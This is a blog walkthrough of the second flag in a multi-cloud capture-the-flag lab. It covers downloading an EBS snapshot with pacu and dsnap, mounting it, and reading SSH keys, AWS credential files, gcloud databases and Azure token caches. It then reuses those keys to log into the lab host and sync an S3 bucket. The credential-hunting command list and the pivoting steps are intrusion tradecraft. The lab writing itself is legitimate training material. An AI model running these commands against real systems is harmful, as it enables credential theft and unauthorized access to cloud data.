Skip to content
All posts

Thunderdome - Pulled From the Sky walkthrough

This is the second in a series of walkthroughs for the Thunderdome multi-cloud Cyber Range from Pwned Labs. This post will guide you through capturing the second flag, "Pulled From the Sky". In the process, I will cover various tools and techniques, showing that there are multiple ways to achieve an objective.

Beginners can benefit from replicating this tradecraft, and even pros might learn a new thing or two! Walkthroughs also give me the opportunity to solidify and refresh my own understanding of offensive security concepts.

Recap  🧵


This walkthrough follows on from flag 1 - Emerge Through the Breach. Let’s recap what we did to capture flag 1!

In the writeup for flag 1, I gave a little hint of what to expect for flag 2...

Make a note of the above, it's a snapshot (ahem) of what you'll need for the next flag!

So let's go ahead grab the snapshot arn:aws:ec2:us-east-1:211125382880:snapshot/snap-0c241b0d00d234853 that was discovered by our CloudFox enumeration and examine it locally. Here's the CloudFox inventory again:

When I was going through the inventory it wasn’t obvious that the next step to finding flag 2 would be the snapshot (although I had a strong suspicion). CloudFox suggested some steps that could be taken to achieve Remote Code Execution on the discovered EC2 instances - i-0874ad63d9693239c and i-0d67cb27d5cc12605. However attempting RCE wasn't successful.

In the loot file instances-ec2PublicIPs.txt we find the EC2 public IPs. The first IP address is the out-of-scope admin box and the second (web-prod) is, which was our starting point. We don’t need to focus on the public IP right now.

There is also an EC2 AMI (Amazon Machine Image) that I wasn't able to do anything with, so it looks like that’s not the path we should be going down. Let's turn our attention to the snapshot snap-0c241b0d00d234853 !


Snapshot enumeration  🧐


You can make snapshots public or share it with specific AWS accounts you own/control. Reading a snapshot typically involves creating a volume from the snapshot and attaching it to an EC2 instance. There’s also another method which is downloading the snapshot locally using the CLI, which is the technique that will focus on. I'll demonstrate a couple of ways we can do this.


You can fire up pacu (we used it during the flag 1 walkthrough if you remember) and check out these two modules - ebs__enum_volumes_snapshots (enumerates snapshots) and ebs__download_snapshots (downloads snapshots). Run the former then the latter. The output path for enumeration findings is ~/.local/share/pacu/<session_name>/downloads.

$ run ebs__enum_volumes_snapshots --regions us-east-1


The ebs__download_snapshots module had some bugs but they have been fixed in release 1.5.3.

$ run ebs__download_snapshots --snapshot-id snap-0c241b0d00d234853 --region us-east-1


Instead of using pacu ebs__download_snapshots we can also use dsnap (a library used by the ebs__download_snapshots module). The primary benefit of using the Pacu module is to reduce unnecessary API calls, but as a tradeoff it doesn't have some of the niceties that are included with dsnap. If you're conducting a penetration test or taking part in a CTF, you’re probably not too concerned about making a lot of noise (such as unnecessary API calls). After installing dsnap (using the instructions in the link above), we can list and download the snapshot.

First, set the AWS credentials we gained and list the snapshot with dsnap list

Download the snapshot with dsnap get

You should now have the snapshot downloaded to your current working directory:

There are different ways to mount the image and examine the contents, with the exact process depending on your local setup and OS. We'll mount the snapshot in a docker container. I used the instructions in the link below to build the docker container for mounting the snapshot -

$ git clone
$ cd dsnap
$ make docker/build

Run docker container and mount the snapshot

$ docker run -it -v "/root/thunderdome/flag2/snap-0c241b0d00d234853.img:/disks/snap-0c241b0d00d234853.img" -w /disks dsnap-mount --ro -a "snap-0c241b0d00d234853.img" -m /dev/sda1:/


A note on using Guestfish:

Guestfish is a command-line tool that's used to access and manipulate virtual machine disk images and filesystems. It's part of the libguestfs suite, which provides a set of tools for accessing and modifying virtual machine (VM) disk images without the need to boot the VM. For the most part, typical Linux commands work (with some nuances):

Using guestfish if you were to ls a user’s home directory, hidden files are returned by default (on a typical Linux box you’d run something like ls -la).

Also, as we saw in the ls output above, there's no current working directory, so pwd returns an error:

You can’t cd to a directory but you can ls it:

Let’s note the hostname:

We’ve seen this IP address before, it’s an internal DNS hostname for an EC2 instance - we saw it during out nmap output for flag1:

Service Info: Host: ip-172-31-90-229.ec2.internal

It looks like it's the private IP address for web-prod, the box that hosts the Massive Pharma external website. We know that the public IP address for web-prod was and can confirm this with the AWS CLI command below using Haru’s credentials.


$ aws ec2 describe-instances --region us-east-1 --profile haru --query "Reservations[*].Instances[*].{Name:Tags[?Key=='Name'].Value|[0],PublicIpAddress:PublicIpAddress,PrivateIpAddress:PrivateIpAddress}" --output table



The IP address in /etc/hostname from the snapshot matches the name and public IP address for web-prod. Alternatively we can also describe the snapshots and identify the volume that the snapshot was taken from, and then describe the volumes to see which EC2 instance it was attached to:

snap-0c241b0d00d234853 (snapshot) --> vol-05ada6051c8801cad (volume) --> i-0d67cb27d5cc12605 (EC2 instance: web-prod)

Hunting for loot  💰

There are a number of key files and directories we want to look at. Here’s a quick list (not definitive) of some files that can help us on the hunt for the next flag... I’ve limited the commands to ls and cat due to the restricted shell:

ls /root
ls /root/.ssh
cat /root/.ssh/id_rsa
cat /root/.ssh/authorized_keys
ls /home
ls /home/<user>/.aws
cat /home/<user>/.aws/credentials
ls /home/<user>/.azure
ls /home/<user>/.config/gcloud/
cat /home/<user>/.config/gcloud/credentials.db
cat /home/<user>/.ssh/id_rsa
cat /home/<user>/.ssh/authorized_keys
cat /home/<user>/.ssh/known_hosts
cat /etc/environment
cat /home/<user>/.bash_history
cat /etc/passwd
cat /etc/group
cat /etc/crontab
ls /var/log
ls /var/spool/cron/crontabs
cat /etc/hosts

Let’s have a look around. The root of the file system doesn't show anything too interesting.

Listing the contents of /root we see a .aws folder.

With AWS credentials inside!  We'll add these to our loot stash.

Next let's check out home directories.

I browsed through the haru and ubuntu home directories but didn’t find anything interesting. In Nacer’s directory, however, we also find AWS access keys! These could prove useful and we’ll add them to our loot stash as well.

Speaking of AWS access keys - looking at root’s crontab it seems that Nacer's AWS keys are periodically rotated on the host. This is information that might be useful later.


We also have Nacer’s SSH key that we can try to log into web-prod, and copy it locally.

Moving into the .azure directory we see Nacer’s Azure environment configuration. This directory is created by the Azure CLI. The file azureProfile.json shows the Azure tenant ID and subscription ID:

We also see the file msal_token_cache.json that contains Nacer’s Azure access and refresh tokens - this is a significant find!

These tokens can potentially help us move further within the organization and pivot to Massive Pharma's Azure environment.

We can try to use the refresh token to request access tokens not only for the Azure Resource Manager resources, but also for the Microsoft Graph and M365 resources such Teams chats and Outlook emails. For more information on the differences between access tokens and refresh tokens, check out this lab:



Access to EC2  🟧


Time to check out the SSH key. After running chmod 600 nacer_ssh.pem we successfully connect to web-prod as Nacer!

Note the banner highlighted above that correlates with the cron job we saw earlier regarding rotated AWS access keys. After gaining access to the EC2 we can try to gain situational awareness and look for ways to escalate privileges using a combination of manual exploration and tools. To check what useful software exist on the box that we may be able to leverage you can run the following Hacktricks one-liner :

$ which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null


We see a few tools above that would definitely come in handy. Depending on permissions and egress restrictions, you could also download tooling on to the host via curl or wget, or use netcat to run a port scan, exfiltrate data, and a lot more.

We’re not going to spend too much time on the box, but let’s look around some more and check for ssh keys. Something to note about running ls with a wildcard * (as in the ls -alh /home/*/.ssh/ example below) against directories belonging to other users is that it doesn’t return any output for directories to which you don’t have permissions, even if the path exists:

We see keys for nacer but we already have this key, so let’s move on and look for Cloud credentials in the default locations:

$ ls -alh /home/*/.aws/
$ ls -alh /home/*/.azure
$ ls -alh /home/*/.config/gcloud/

The output above shows AWS credentials and Azure credentials for nacer. Let’s take a closer look!

These AWS keys are different to the ones we found in snapshot, due to the daily rotation of AWS keys.

Let’s see if any AWS credentials are currently active on the box:

From the above output we have the following AWS information:

AWS account ID: 211125382880

We can use the AWS credentials we found for Nacer and enumerate from our attacker machine, but we need to be aware the credentials rotated daily. Also, there may be ABAC (Attribute Based Access Control) Condition definitions applied to resource policies (such as aws:SourceVpc or aws:SourceIp) which could prevent our enumeration attempts outside of the host. These controls would have been fundamental in limiting the blast radius of the Capital One breach, but that’s another story... With that said, let's use the AWS credentials on our local machine and come back to web-prod if needed.

Let’s configure Nacer’s credentials locally and see if we can list S3 buckets:

We get an AccessDenied message. Let’s see if this has anything to do with IAM Condition definitions we were talking about earlier and run the same command on web-prod:

We still get AccessDenied so it may be related to Nacer’s permissions. I tried various aws cli commands to view permissions, and also tried iam simulate-principal-policy to get an idea of which permissions may be in effect, but no joy (looks like Nacer is lacking permissions like iam:ListUserPolicies and iam:ListAttachedUserPolicies). I did some automated enumeration with Cloudfox but didn’t find anything of interest that I didn’t already know from the previous flag, so we’ll have to do some manual enumeration. Since listing S3 buckets is not allowed, how about listing a particular S3 bucket?

We’ll need a bucket in the account to try this with… remember the one we gathered from one of the Bitbucket commits in flag 1? It was mp-clinical-trial-data . Let’s try the command again on our local machine, but this time we’ll mention this bucket specifically.

Success! But wait - we weren't able to execute aws s3 ls so why were we able to execute aws s3 ls s3://mp-clinical-trial-data ? This could be because although Nacer doesn't have s3:ListAllMyBuckets permissions, he does have s3:ListBucket permissions for mp-clinical-trial-data specifically. He may also have other permissions on this bucket (such as s3:GetObject).

Let’s try and download all the content in mp-clinical-trial-data to our local machine. We can do this by running aws s3 sync s3://mp-clinical-trial-data . --profile nacer . Something to note is that aws s3 sync works recursively by default. We should now see the following:

Okay, now let's check the contents of those downloaded directories.

There’s the second flag! But we're never done with just the flag, we need something that will help us move deeper within Massive Pharma. Grab the flag, submit it, and have a look at the .csv file:

The file looks like it’s a list of clinical trial candidates and their medical information. Not information which should be readily available, but of no use to us at the moment. Let’s turn our attention to admin-temp. We see a file called openemr-5.0.2.tar.gz. We’ll extract this see what we can find:

Ok, so what’s OpenEMR? Apparently it’s "Free and Open Source electronic health records and medical practice management application". See here if you want to read more - I had a look around various files and directories but didn’t find anything interesting. I ran TruffleHog (a secrets scanning tool) against the directory but nothing particularly helpful was flagged - ./trufflehog filesystem <path>/mp-clinical-trial-data/admin-temp/openemr-5.0.2/. It returned a bunch of false positives but the Detector Type: SQLServer entries that mention mention SQLServer are interesting and something we should probably note:

What about the Azure credentials we found?

Heading back to web-prod we can also check if any Azure credentials are currently active on the box:

From the above output we confirm that we have compromised the Azure user and can start to gain situational awareness!

Trying to pull the active access token via az account get-access-token directly on web-prod failed, possibly due to permissions issues on the msal_token_cache.json file. We can cat the file, however. Let’s grab the output and keep it on our local machine.

Next time we'll run through using the Azure credentials we’ve found, and look at the importance of, *ahem* "Teams work" and poking databases with pointy things.

See you then!